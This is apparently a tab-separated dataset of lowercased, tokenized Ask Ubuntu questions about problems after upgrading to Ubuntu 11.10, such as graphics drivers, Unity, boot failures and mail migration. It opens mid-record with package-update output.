//us.archive.ubuntu.com oneiric/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric/universe i386 packages hit http : //us.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric/main translationindex hit http : //us.archive.ubuntu.com oneiric/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric/restricted translationindex hit http : //us.archive.ubuntu.com oneiric/universe translationindex hit http : //us.archive.ubuntu.com oneiric-updates/main sources hit http : //us.archive.ubuntu.com oneiric-updates/restricted sources hit http : //us.archive.ubuntu.com oneiric-updates/universe sources hit http : //us.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //us.archive.ubuntu.com oneiric-updates/main amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/main translationindex hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //us.archive.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric/restricted translation-en hit http : //us.archive.ubuntu.com oneiric/universe translation-en hit http : //us.archive.ubuntu.com oneiric-updates/main translation-en hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-updates/universe translation-en fetched 7,039 b in 5s ( 1,347 b/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : wine 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded .
66153	will not start after clean install ( hangs at disconnected from plymouth ) on a toshiba satellite	i tried upgrading my toshiba satellite laptop with nvidia graphics card from 11.04 to 11.10 - it hung and failed , so i reinstalled from scratch as i had no other choice . when the system boots , it just sits on the black screen saying `` disconnected from plymouth '' . i 've done ctrl-alt-f1 and can access the command line without any problems - i tried doing startx from there but it just says something to the effect of nv module not found . i uninstalled and reinstalled the nvidia-current driver , made no difference . also tried dpkg-reconfigure lightdm , and chose gdm . this worked sort-of , but i ca n't log in - no matter what i choose ( unity , unity2d , gnome ) it flashes to a black screen , then back to the login window . anyone have any ideas ? i ca n't put up with using windows for much longer !
66158	which free 2d game engine for ubuntu is the best choice for me ?	which free game engines on ubuntu would be the best choice for me to create 2d games . the engine should not be too hard to use and support multiplayer if possible . i 'd use it to create games with graphics like teeworlds in combination with inkscape ofc . i have tried lรถve which is one of the free 2d game engines i find very interesting . it 's available at http : //love2d.org/ . it uses lua for the programming language . any suggestions ? thanks
66160	removal of unity-preferences makes launcher not show up	in 11.04 i used the unity-preferences tool ( called menu and launcher in the the dash i believe ) to set unity to only reveal when the mouse was moved to the upper corner . i liked this method better as there was less of a chance of accidentally opening the launcher . now in 11.10 unity-preferences is gone , and the corner no longer opens up the launcher . that 's fine , but now the launcher wo n't open at all . i ca n't hover over the edge of the screen to open the launcher . i 'm guessing something is still respecting the `` corner only '' launch option i had set previously , but the new window controls are preventing that from triggering the launcher . and now that unity-preferences has been removed , i have no way to set it back . i looked through all of the settings for unity in gconf , but could n't find anything pertaining to this specific setting , only the compiz only settings . does anyone know where the old unity-preferences tool stored its setting ? or could this be a different issue ?
66162	manually migrate from evolution to thunderbird	after installing 11.10 , evolution stayed the default mail client on my system . i guess that is because i ( a ) already had thunderbird installed for a test-drive a while ago and/or ( b ) i had evolution configured quite extensively . i prefer to remain with ubuntu 's choice and would like to setup thunderbird as my default client . can i : set thunderbird as default client trough a script or command ? or do i need to edit some config files ? migrate my mailaccounts and their settings ( login , smtp etc ) ? is it possible to manuall run the migration path that other upgrading users would get ? migrate my calendar settings to lightning ? migrate my mailfilters ? migrate my addressbook ?
66166	ca n't find old emails after upgrading to ubuntu 11.10	can anyone tell me where i can find my old emails that existed prior to upgrading new version of ubuntu 11.10 ?
66171	very hot cpu on hp/compaq 615	i am using an hp compaq 615 amd dual-core laptop , and i just upgraded to oneiric . however , my cpu temperature has never been below 65 degrees c. when my laptop had windows 7 starter , the temperature would stay between 40-50 degrees c. obviously ubuntu/linux is using too much cpu power , even though the ram usage is minimal . is there any way to lighten the cpu load ? e
66173	screen becomes black after pressing dash or alt-tab	i did an upgrade from 11.04 to 11.10 . unity 3d becomes a black screen after pressing the dash-button or after pressing alt-tab to switch between open windows . i can see the panel on the top ( lock , sound , .. ) and the panel on the left ( launcher ) but the rest is black . it looks like a maximised black window . the open windows are active but i cant see them . i logout by pressing logout in the right top corner and pressing enter ( because logout is default focused on the dialogue screen ) and leave unity3d . unity3d worked with 11.04 very good . if i press the dash button the dash looks like an 16-bit or 8-bit window and buttons for maximise , minimise and close are displayed and looks inverted . i have rebooted my notebook just now and log in to unity 3d and tested some features of unity and everything works well . the black thing is only a layer . i can use my desktop but cant see anything because of the layer , but everything works . it seems so , that a layer appear when pressing dash or alt-tab and does not disappear when close dash or choose a running app with alt-tab . you will see the necessary info related video problems : unity support : /usr/lib/nux/unity_support_test -p opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rc410 opengl version string : 2.1 mesa 7.11-devel not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes xorg glxinfo lspci -nn | grep vga 01:05.0 vga compatible controller [ 0300 ] : ati technologies inc rc410 [ radeon xpress 200m ] [ 1002:5a62 ]
66174	is the `` ubuntu-bug '' tool broken ?	it asks me for a pid , even though it did n't in previous versions . if i do n't provide one or if i choose `` other problem '' , it closes saying that i need a pid . if i put the symptoms in the terminal , it crashes saying there is no package matching the description . i have several bugs that do n't affect any of the options provided by `` ubuntu-bug '' hence i would need to file it under `` other problem '' .
66175	mount -o rw , < user > /dev/src1 /media/ < mount-name > not working	i have burned the ubuntu iso distribution on my flash drive and i boot into ubuntu from the flash usb drive . note that i am using the option 'try without installing ubuntu ' while booting . the problem is if i try to use any other usb device all the file system on that usb device appears read only to the default ubuntu user as well as for the root . the volume appears as read-only . next , i tried to remount the usb device and make it rw using sudo mount -o rw , ubuntu /dev/src1 /media/ < mount-device-name > while the command seems to succeed and i get no errors , the device doesnt become read-write . the mount entries in fstab still show the device as read-only . any suggestions as what is going wrong ?
66181	how do i enable the globalmenu / appmenu on xfce or lxde ?	i have tried various tricks i could find to install the global menu on xfce and lxde on the latest oneiric , but nothing worked . does anyone have an idea on how to do that ? thanks . here 's what i 've tried so far : the gnome global menu panel plugin ( for lucid ) via the xfapplet plugin ( not in the official repos anymore ) that can embed gnome plugins into the xfce panel - unfortunately , the globalmenu does n't show up in the xfapplet list of available gnome plugins ( there 's only one item in it ) all instructions from an older question about globalmenu and its duplicate compiling manually the latest version from gnome2-globalmenu there is another question along with a solution for xfce 4.8 , but it 's not working on oneiric . it is also proposing to install the global menu applet from gnome using it via xfapplet . i 've even found an xfce-plugin for the global menu , but it keeps crashing when i add it to the panel - also i could not install all the packages due to some unmet dependencies i 've added some code to ~/.config/xfce4/xinitrc as described in 10. of the faq of gnome2-globalmenu , though i 'm not sure what effect this should have .
66182	how do i switch back to gdm and have it launch at boot ?	so i got rid of lightdm but how do i get gdm to launch at default . it hangs on `` checking battery state '' this is in virtual box if that matters . i want gdm login to load by default instead of me starting it manually .
66183	how can i get some nice eye candy themes for grub ?	grub is well grub . how do i pimp it a bit with some nice themes ?
66187	how to configure the browser view in banshee ?	it appears that i am unable to change the browser view in banshee via the gui . but surely it 's possible to set the `` artist list '' column to something like `` album-artist list '' or `` year of publication list '' , is n't it ? please tell me which file to edit .
66188	nautilus exiting with segmentation fault after upgrade	i upgraded to ubuntu 11.10 yesterday from 11.04 . everything went smoothly except the fact that nautilus wont start anymore . it exits with a segmentation fault . any idea how to stop this from happening . ? : ~ $ nautilus initializing nautilus-open-terminal extension initializing nautilus-gdu extension ** ( nautilus:9741 ) : debug : syncdaemon already running , initializing syncdaemondaemon object ( nautilus:9741 ) : gtk-critical ** : gtk_action_set_visible : assertion `gtk_is_action ( action ) ' failed ( nautilus:9741 ) : gtk-critical ** : gtk_action_set_visible : assertion `gtk_is_action ( action ) ' failed segmentation fault
66193	when launching , nvidia-settings it just hangs	i 've just upgraded to 11.10 and now nvidia-settings wo n't launch . if i run it from the command line ( as me or as root ) it just hangs . how can i debug this ?
66194	how do i migrate my postgres data from 8.4 to 9.1 ?	i have upgraded my ubuntu development machine from 11.04 to 11.10 . in the process my postgres was also upgraded from 8.4 to 9.1 . but i seem to have lost all my data . if i look , i can see that my data for 8.4 is in folder /var/lib/postgres/8.4/main and my new database is in /var/lib/postgres/9.1/main . what is the best way to migrate my data to the new version ? can i just copy the files ?
66195	what is a tty , and how do i access a tty ?	i keep hearing about these things known as tty 's . what are they how can i access them what do they do ?
66200	is firefox not rendering a web page correctly compared to the same version on windows ?	i recently discovered that firefox on ubuntu does not render well some web pages compared to how it renders them on windows ( where the rendering is correct ) or even to chromium on the same ubuntu box ( chromium also renders them correctly ) . i thought it was a problem with ubuntu , but using chromium on ubuntu convinced me that it may be a problem in firefox or a combination of firefox and ubuntu . here is a screenshot of an area of a webpage rendered with firefox : and here is another one for the same area but rendered correctly with chromium under the same ubuntu machine : i 'm using the latest stable firefox version : 7.0.1 on the latest 11.10 ubuntu release . i tried to remove ( totally ) and reinstall firefox but the problem persists . i never experienced this problem with previous firefox releases on previous ubuntu systems for the same webpages . the screen shots where taken from http : //www.builtwith.com . any insights ?
66201	ati proprietary drivers not working with an ati radeon hd 3400	i am using lenovo thinkpad laptop with ati radeon hd 3400 series graphic card . i installed ubuntu 11.10 64 bit today and tried to install proprietary drivers 1 ) hence i installed proprietary drivers displayed on my system ( through jockey ) .rebooted my system . performance is better now but still compiz is not working . 2 ) then i tried the second driver available - 'post-release-updates ' but could n't install due to some error . hence i opened synaptic and installed fglrx-updates and rebooted my system . not much change and still compiz didnt work 3 ) removed all these packages and downloaded the latest driver from ati http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ? type=2.4.1 & product=2.4.1.3.42 & lang=english and installed it and rebooted my system . this is worse as i dnt get even launcher or dash this time - i guess i am forcefully logged in to ubuntu 2-d . still compiz is not working am i doing something silly here ? is any one facing similar issues with ati ? please help thanks .
66205	settings schema 'com.canonical.unity2d.panel ' is not installed	i 'm unable to run unity-2d-panel . i 've tried apt-get -- reinstall . this is with 11.10 32 bit oneiric - upgraded from natty . any idea how to get past this ? here is the .xsession-errors when starting ubuntu 2d : http : //paste.ubuntu.com/708039/ in a terminal , i get : unity-2d-panel : [ fatal ] settings schema 'com.canonical.unity2d.panel ' is not installed ok . i 've gotten past this , i used dpkg to list all packages having 'unity ' in them and re-installed all of them , it turns out some of the dependencies were wrong and somehow unity-2d-places and unity-2d-spread were not installed . it seems something deeper has gone wrong in my packaging ... i 'm now having missing icons , etc .
66206	will installing atis drivers fix the choppiness of my ati mobility radeon hd 4250 ?	i have some questions about the drivers for ati video cards . i recently downloaded and installed the drivers for my machine , and the experience became very choppy and laggy , though it did fix the lag that i had when the dash was opened . anyway , i got another update for the same drivers , except these are `` post-release updates '' for the drivers . should i install those , and would they fix the choppiness of my desktop ? or should i just uninstall the proprietary drivers and go with the open source drivers , and where would i have to go to download and install those drivers if they are n't already installed ? also how would i go about removing the proprietary drivers since i already have them installed ? thanks ! : )
66208	how to modify the system default background image	i am about to ship a new 10.04 installed system to a customer . this is the 1st system that we are shipping with our preinstalled software and an additional hardware test platform , so i thought it would be a nice idea to have the desktop wallpaper include our company 's logo . what i want to do is just to add the logo to the default background image . the questions are : where are the set of backgrounds stored ? what are the rules for creating a custom background from scratch ? if i create a background from scratch , how do i add it to the system 's background set ( i.e. , not just save it in the user 's pictures directory - i want it to be available to all future users of the machine ) ?
66209	removing packages installed outside of software center	i installed a driver a while ago and now need to remove it to be able to install a new driver . the new driver is compatible with software center but will not install saying it can not co-exist with the old driver . the old driver was installed in terminal . i have tried sudo apt-get purge driver and sudo apt-get autoremove driver but it will not uninstall . any other ideas ?
66219	what 's an alternative i could use instead of mp4v2/mpeg4ip ?	i 've been looking for mp4v2 and mpeg4ip - they are no longer in the multiverse repos in oneiric . i 'm looking for something with equivalent functionality that i can use to give banshee , libgpod and gtkpod functionality to convert and put .m4v files on an ipod .
66220	wubi taking long time to install	decided to try the new ubuntu with wubi . however i 've been installing for 2 hours now and the progress is always around 3hrs 30min ... sometimes it goes to 3hrs 28min , then bounces back to 3hrs 40min . it has been like that for the past 2 hours and i read that the installation should only take less than one hour . here are my hardware specs : amd athlon ii x2 4400e 2gb ddr3 ram win7 ultimate x64 thanks
66221	unity broken after changing few compiz settings , fresh 11.10 install	i just did a fresh install of ubuntu 11.10 and then changed ( or tried to anyway ) some settings of the unity launcher using the compizconfig settings manager . i only changed some settings in the unity plugin and some in the alt-tab switcher thingie i think . then when i closed the ccsm it crashed and my unity bar is gone and wo n't return even after several reboots , unity -- replace , unity -- reset and even reinstalling everything unity-related . when i try to start unity in the terminal this is the output i get : unity -- reset unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : default adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing staticswitcher options ... [ error ] : option `` next_button '' already defined [ error ] : option `` next_key '' already defined [ error ] : option `` prev_button '' already defined [ error ] : option `` prev_key '' already defined [ error ] : option `` next_all_button '' already defined [ error ] : option `` next_all_key '' already defined [ error ] : option `` prev_all_button '' already defined [ error ] : option `` prev_all_key '' already defined [ error ] : option `` next_group_button '' already defined [ error ] : option `` next_group_key '' already defined [ error ] : option `` prev_group_button '' already defined [ error ] : option `` prev_group_key '' already defined [ error ] : option `` next_no_popup_button '' already defined [ error ] : option `` next_no_popup_key '' already defined [ error ] : option `` prev_no_popup_button '' already defined [ error ] : option `` prev_no_popup_key '' already defined [ error ] : option `` next_panel_button '' already defined [ error ] : option `` next_panel_key '' already defined [ error ] : option `` prev_panel_button '' already defined [ error ] : option `` prev_panel_key '' already defined [ error ] : option `` speed '' already defined [ error ] : option `` timestep '' already defined [ error ] : option `` window_match '' already defined [ error ] : option `` minimized '' already defined [ error ] : option `` auto_change_vp '' already defined [ error ] : option `` popup_delay '' already defined [ error ] : option `` mouse_select '' already defined [ error ] : option `` saturation '' already defined [ error ] : option `` brightness '' already defined [ error ] : option `` opacity '' already defined [ error ] : option `` icon '' already defined [ error ] : option `` icon_only '' already defined [ error ] : option `` mipmap '' already defined [ error ] : option `` row_align '' already defined [ error ] : option `` focus_on_switch '' already defined [ error ] : option `` bring_to_front '' already defined [ error ] : option `` highlight_mode '' already defined [ error ] : option `` highlight_rect_hidden '' already defined [ error ] : option `` highlight_color '' already defined [ error ] : option `` highlight_border_color '' already defined [ error ] : option `` highlight_border_inlay_color '' already defined done initializing resize options ... done initializing fade options ... done initializing scale options ... done initializing session options ... done any thoughts on how to fix this ? i also installed the proprietary nvidia drivers ( current version that was recommended ) and then rebooted without a problem , only after changing some things using the ccsm it crashed so i do n't think this is the problem ?
66224	how to change the screen dpi in 11.10 ?	i want to change the dpi of the screen that is used in ubuntu 11.10 . how do i do this ? i do n't just want to change the font size like in how do i change the font dpi settings ? , but i also want the icons to appear bigger .
66229	how to get unity working on dual gpu laptop ?	i recently bought a new laptop ( asus x53s series ) that has two gpus , an nvidia geforce gt 540m and an integrated intel gpu ( i believe it 's called intel hd graphics 3000 ) . i installed the recommended restricted nvidia drivers after a clean ubuntu 11.10 install . in the 'additional drivers ' program i get the message : `` this driver is enabled and in use '' , although when i try to open the nvidia x server settings it says `` you do not appear to be using the nvidia x driver . '' which seems to be the case since ubuntu only starts using unity 2d . i 've had the same issue in 11.04 and i was forced to use the nouveau driver just to get unity working , but since i get quite a few crashes with it i really want to get the propriety driver working this time around . since i 've never had this issue with older laptops , i can only assume it is caused due to the dual gpu configuration . how do i get ubuntu to use the propriety drivers , or is there any workaround to get the integrated intel gpu to be ignored by ubuntu ? alternatively , has anyone got unity working with a similar setup ?
66230	how do i add an icon to an app that does n't have one ?	some apps from the ubuntu software center do n't have any icons that ubuntu unity desktop even sees , such as eric , the python ide . the results are ugly : i get this ugly question mark icon , and i ca n't find any way to configure that icon . there is no more ability to create a launcher icon on my desktop , or to really control ( from the unity gui anyways ) what icon appears for an app , and if the default ways that unity finds icons break down , it appears that the results are stuck on `` ugly '' permanently . ubuntu version : 11.10 ( oneiric ocelot ) update : the answers so far show that something is wrong with my brand new installation , because other people see the icon for eric ( eric.png , i guess ) . interestingly , many icons in ubuntu are svg , and some are png . i wonder if that 's the problem . still no ability to change or set the icon for any app , either using the gui , or via vi-and-terminal-and-editing files .
66231	can i work while upgrading ?	as the title says , i want to upgrade ubuntu to 11.10 but i must keep working my whole day . i do n't mind a couple of reboots , but i need to work my day . can i still fully work while it upgrades or does it blocks the system ? thanks .
66233	why mac users do n't see me online when i use msn through empathy ?	why macintosh users do n't see me online when i use msn through empathy ?
66239	delayed sound in with intel hd audio	i have just upgraded from my natty to oneric and i am having a problem . the audio seems to be delayed compared to the video . it is n't just a bug in flash , 'cause the sound is delayed in every video that i 've tried to play in computer . does anybody know what to do ? my configuration includes intel i5 2500k and asus p8h67-m evo with intel hd audio
66244	how do i safely remove gwibber ?	i 'm really in love with ubuntu but i 'm not used to gwibber , for some reason . i ca n't remove gwibber without removing the ubuntu-desktop package . is it safe to remove it , without ruining my desktop ?
66250	graphics card drivers - dual-link dvi ?	running default install of ubuntu 10.04 on pc with geforce 9500gt graphics card - would there be any problems running a monitor that needs dual-link dvi cables ?
66253	how to configure logitech marble trackball	you can configure it using xinput . i tested this in 11.10 and it works very nicely . this selection is from `` ubuntuwiki '' avoid using hal for this release because it has known issues . put the following into terminal , using gedit : edit $ home/bin/trackball.sh using this command : gedit $ home/bin/trackball.sh then paste this into the file : # ! /bin/bash dev= '' logitech usb trackball '' we= '' evdev wheel emulation '' xinput set-int-prop `` $ dev '' `` $ we button '' 8 8 xinput set-int-prop `` $ dev '' `` $ we '' 8 1 # xinput set-int-prop `` $ dev '' `` $ we '' 8 1 # xinput set-int-prop `` $ dev '' `` $ we button '' 8 9 # xinput set-int-prop `` $ dev '' `` $ we x axis '' 8 6 7 # xinput set-int-prop `` $ dev '' `` $ we y axis '' 8 4 5 # xinput set-int-prop `` $ dev '' `` drag lock buttons '' 8 8 make sure trackball.sh begins with # ! /bin/bash . make the script executable by running this : chmod +x $ home/bin/trackball.sh` add the following lines to $ home/.bashrc , using gedit $ home/.bashrc and put this in the file even if it is empty : xmodmap $ home/.xmodmap > /dev/null 2 > & 1 $ home/bin/trackball.sh edit $ home/.xmodmap using : gedit $ home/.xmodmap pointer = 1 8 3 4 5 6 7 9 log out and back in and viola !
66255	`` wireless authentication required '' on a samsung n150	i have a samsung n150 plus netbook with a broadcom bcm4313 wireless adapter . today i installed ubuntu 11.10 desktop 32 bit . when i try to connect to the wireless internet router i repeatedly receive this message `` authentication required by wireless network . '' i had this same problem with ubuntu 10.04 . are there any suggestions ? thanks in advance..
66257	what is the difference between a meta-package and a package ?	i 've heard some packages being classified as a meta-package . so now i am left wondering what is the difference between a meta-package and a package ?
66265	how to setup yahoo messenger in empathy ?	after upgrading to 11.10 , empathy is not connecting to yahoo messenger . what are the new setup steps ?
66269	unity 3d on live cd - only 2d on install	every time i log in , unity switches to 2d instead of 3d . this is what i 've been trying so far : install proprietary drivers nvidia . unity -- reset install compiz effects choose `` ubuntu '' instead of `` ubuntu 2d '' on login screen i 've tried to reinstall ubuntu several times with the same result , but i 've noticed that on the live cd/usb ubuntu uses unity 3d . but after the install it switches to 2d . i do n't know what to do . can someone please help me out here ? my computer is a asus u35j .
66270	when will i be able to move the unity sidebar ?	i have an older desktop , that i really love , and it has a 4:3 screen , the kind i prefer . quite frankly , the unity sidebar is terrible on my screen . it looks great on my tiny netbook , and i love it there . but my desktop screen is large , and the unity sidebar sucks on it . if i could move it , i would be very happy . any idea when people will see sense and allow us to move it ?
66272	is groupwise not supported in evolution ?	after upgrading to ubuntu 11.10 , existing groupwise accounts do not work in evolution . if i try to create a new account , there is no option to choose a groupwise account . it appears that this functionality is no longer built in to ubuntu 11.10 and the package `` evolution-groupwise '' is not available in the repositories ...
66273	after installing ubuntu 11.10 , laptop just restart to post or go to internal shell	ok , i have been using ubuntu since 8.04 on my old laptop , but some months ago i got a new one and since that day i 'm having some bad times . first lem me describe it . it 's a cce ( brazilian brand ) wm545b-t with 4gb ddr3 , intel i5 sandy bridge 2500k iirc , intel hd 3000 ( great integrated card btw ) and a 500gb 5200rpm hd ( yeah , i know ... ) . it 's motherboard is , iirc , a intel hm65 . as i reported in a question before , when i first got it , i tryed to install ubuntu 11.04 and got some weird screen bugs . i got around that installing superos , a ubuntu 11.04 based distro . yesterday at 8am ( brazil time ) i saw some ubuntu cds from the oficial release repos ( before the oficial release by canonical ) , downloaded via torrent , checked md5 and used unetbootin to burn it to a pendrive . started the install like i always do any other os install , the weird screen bug was there again ... but this time i was able to click the first option and start the live cd . great ... i was finally gon na use my loved distro again . oh man , i was wrong . the live cd worked great and insanely fast . i runned the installer and went to the advanced options for partitions . i have 3 ntfs partitions ... one with 20gb for w7 64bits , one with 100mb with system files that w7 created and the rest is for my personal files . made a 25gb ext4 one for ubuntu and a 4gb swap one . the bottom of the install ask me where i wan na install the bootloader , with /dev/sda ( my hd ) by default . then installed it and the install went without a problem . made me happy ofc . when the laptop was booting again , the first problem . it did not boot ... just freeze at post or restart . ok ... went to the live cd again and this time tryed a different setup for my partitions . tryed to install the bootloader in /dev/sda2 , with windows boot loader . this time it booted ... but on a efi shell , something i have no idea about what is . tryed again ... created swap , ext4 for ubuntu and this time also created a efi partition ( i thought hey , it says efi , lets try it lol ) ... same efi shell saying something about startup.sh and then gim me a shell > inpurt commands here line of command . i have never see this efi shell before and i ca n't find infos about it on the internet . not infos i can use to install ubuntu at least . anyone know what is that or how can i install my lovely distro ? right now i have some options in mind : 1 . format my entire hd losing 232gb of important fles and try to install ubuntu 11.10 on the entire hd to see what happens ; 2 . install w7 from zero and install ubuntu with wubi losing performance with it ; 3 . use fedora ( that install and boot normaly ) or some ubuntu 11.10 distro based ( that will take sometime to appear ) ; 4 . delete my w7 partition , install ubuntu 11.10 and then install w7 again ... recover grub and see what happens ... anyone have an answer for this question before i try one of those ideas ? my obvious idea is the problem is based on my boot since the live cd works ok and other distros based on ubuntu runs fine . i have tested ubuntu 10.10 and give me same 11.04 issues ... but elemetaryos , based on 10.10 , works fine . i do n't know what tweak they do on the boot ... but something happens there . anyone have an answer for this ? edit : ok , i think i may know what is going on . runned sudo fdisk -l and this is what i get from it : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2b510800 device boot start end blocks id system /dev/sda1 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 40962047 20377600 7 hpfs/ntfs/exfat /dev/sda3 102402048 976771071 437184512 7 hpfs/ntfs/exfat /dev/sda4 40964094 102402047 30718977 5 extended /dev/sda5 94191616 102402047 4105216 82 linux swap / solaris /dev/sda6 40964096 94189567 26612736 83 linux if you take a close look , there is no `` * '' , so maybe it means there is no boot device set ? then when i try to boot from hd it does n't find any bootable device and give me the internal shell ( efi shell ) . anyone can help me fix this ?
66275	alt tab switcher effects not working	yesterday i upgraded ubuntu from 11.04 to 11.10 . there is a nice effect of alt tab switcher with windows preview in 11.10 but with my system only simple alt tab switcher is working without effects . i have nvidia 1gb graphics card . i was using ubuntu classic with 11.04 as driver was not working with it but with 11.10 now nvidia driver is working and i want all unity effects . i have installed compiz setting manager but ca n't able to enable alt tab switcher effects from anywhere .
66276	no ubuntu one sync in my tomboy notes sync preferences	there is no option for ubuntu one in tomboy sync preferences here is what i can see : local folder ssh ( plugin activated ) tomboyweb webdav when i try to setup sync with tomboyweb , the save button is inactive . local folder sync runs well any idea ?
66277	after upgrading to 11.10 and restarting it freezes on ubuntu logo screen	i have just upgraded my sustem to 11.10 everything goes well but then after restart i just see the logo screen and can not do anything . do you have any suggestions ? thank you
66278	unity launcher ignores compiz settings	i 've followed the steps in a number of other posts on askubuntu . installed compiz , set the launcher to autohide and reveal mode to none . yet , the launcher somehow maintains it 's default setting to dodge windows and reacts to left reveal . i 've tried updating in three manners : with compiz settings manager manually with gconf-editor manually with dconf write . none of these seem to work . here 's a frustrating screen shot with the setting showing up correct in compiz setting manager , but the launcher still learing at me . related : previous question ( resolved )
66280	one cpu shows up as 1200 mhz and other 3 as 800 mhz , is this normal ?	i recently check my system information with ubuntu 's app `` system profiler and benchmark '' . and i get 1 cpu running at 1200 mhz and the other 3 running at 800 mhz . it 's correct ? , intel core i3-2310m cpu 2.10 ghz works like this ? [ my laptop is a hp 430 ]
66281	samba config gui tool does n't run	i am trying to access my windows 7 pc from my ubuntu laptop running 11.10 64bit but i can not open the system-config-samba gui . i am following this tutorial . my windows 7 pc sees the laptop no problem at all .
66283	where does my browser store temporary data ?	how can one look at content of temporary cache of his computer ? after something not actually downloaded ( just pressing the button to open data not download ) to any directory , this data temporarily stored in some place but my computer stores them as permanent . how can i look at that directory then erase unused data ? in other words , my `` browser puts stuff in '' ex : to watch video , just press open rar file from website like rapid . or to look at ebook , just press open zip file . they must be erased automatically but my computer stores them . edit : most of time , i am using firefox , but i have also used chromium and safari .
66284	unity bugs with external monitor connected to thinkpad t410 as a second display	i have unity since it came out in ubuntu 11.04 . now upgraded to 11.10 with fresh install and there are few annoying things when using external monitor as a second display to the main on laptop . 1/ unity top bar is appears on both displays but when clickin on one of the indicators it opens it no problem . on second monitors when clicking on any indicators one click just opens and closes it . mouse left button needs to be pressed and then indicator menu opens and stays . 2/ when using key conbination super+s , all 4 workspaces are displayed but there are pieces of current wallpaper outside shown workspaces . it certainly looks like completely broken . it was working fine in 11.04 , and stopped in beta 1 ubuntu 11.10 . can someone tell me weather those bugs are already reported ? why multi monitor setup is so broken in unity ? even in current 11.10 release ?
66285	root password problems after upgrade	i upgraded to 11.10 yesterday . my nautilus started to crash on load , looks like a known bug with remote terminal plugin nautilus exiting with segmentation fault after upgrade . so i decided to uninstall it , but that was the beginning of my nightmare - my root password is changed . yes , i type in the right password , but auth fails ! i do n't know what to do , i ca n't auth as root , which means i ca n't install/uninstall packages . umpirsky @ umpirsky : ~ $ su password : su : authentication failure any idea ? please help . update : i removed default keyring , but problem resists . rm ~/.gnome2/keyrings/default.keyring
66288	how do i make the calendar stay open after it loses focus ?	i recently upgraded to oneiric and noticed that the calendar is no longer persistent like it was in natty and maverick . i could open the calendar to january 2007 , then move to another window and still refer to the calendar . now , as soon as i lose focus the calendar goes back into hiding . is this a setting somewhere ?
66289	compiz hiding unity and all menus	after updating to ubuntu 11.10 , i was severly disturbed by dash and wanted to go back to ubuntu classic . so i tried to read up , and found compiz settingsmanager . in there , i clicked `` on '' never hide menus . for some reason this made all my menus at the top of the screen ( volume , network , my login identity , and shutoff , etc ) disappear - as well as the quickstart menu to the left ( unity ) . i am not very technical , so i have a hard time finding any programs now , and i just got on the internet by clicking on a link in a document , that i was fortunate to have on my desktop . without it , i would n't be able to ask for help . what i wish for is a ) to get back the menu at the top , b ) to restore the ubuntu classic without the irritating launcher and dash , c ) these two things to not disappear every time there is a new version of ubuntu . any help is greatly appreciated .
66290	xubuntu 11.04 and canon powershot a470	i have a digital camera canon powershot a470 , and xubuntu 11.04 installed on my pc . when i attach the camera to pc xubuntu do n't mount it , and do n't show attached device ... how i can use camera on xubuntu ?
66293	reinstate system menu after reverting to gnome classic ?	how do i get the system menu back on the top panel after reverting to gnome classic on 11.10 like suggested in this answer to how to revert to gnome classic
66297	can not access `` multiverse '' in the ubuntu software center	i ca n't seem to access `` muiltiverse '' in the software center . i have it checked in the settings , but when i search for libhighgui , which is in multiverse , it does n't show up . is anyone else having this problem ?
66302	can i use the adwaita theme in unity without installing gnome shell ?	i recently installed ubuntu 11.10 ( new install ) . i would like to use the adwaita theme with unity , but it seems that it is not available in the theme selection dialog . i know i get it there after installing gnome-shell , but is there a way to use adwaita theme for unity without installing gnome-shell ?
66304	problems after installing ati proprietary driver	i 'm an absolute beginner with ubuntu . after installing 11.10 i get a message to install ati proprietary driver . the new one ca n't be installed , the older one get installed . after installation i must reboot . i do so and my monitor shows me something like `` 70hrz horizontal and 60hrz vertical are not supported '' on a black screen . i do n't find a way to set other resolution like 1024x768 or 1280x1024 and i ca n't see something , even cpu seems to be working .
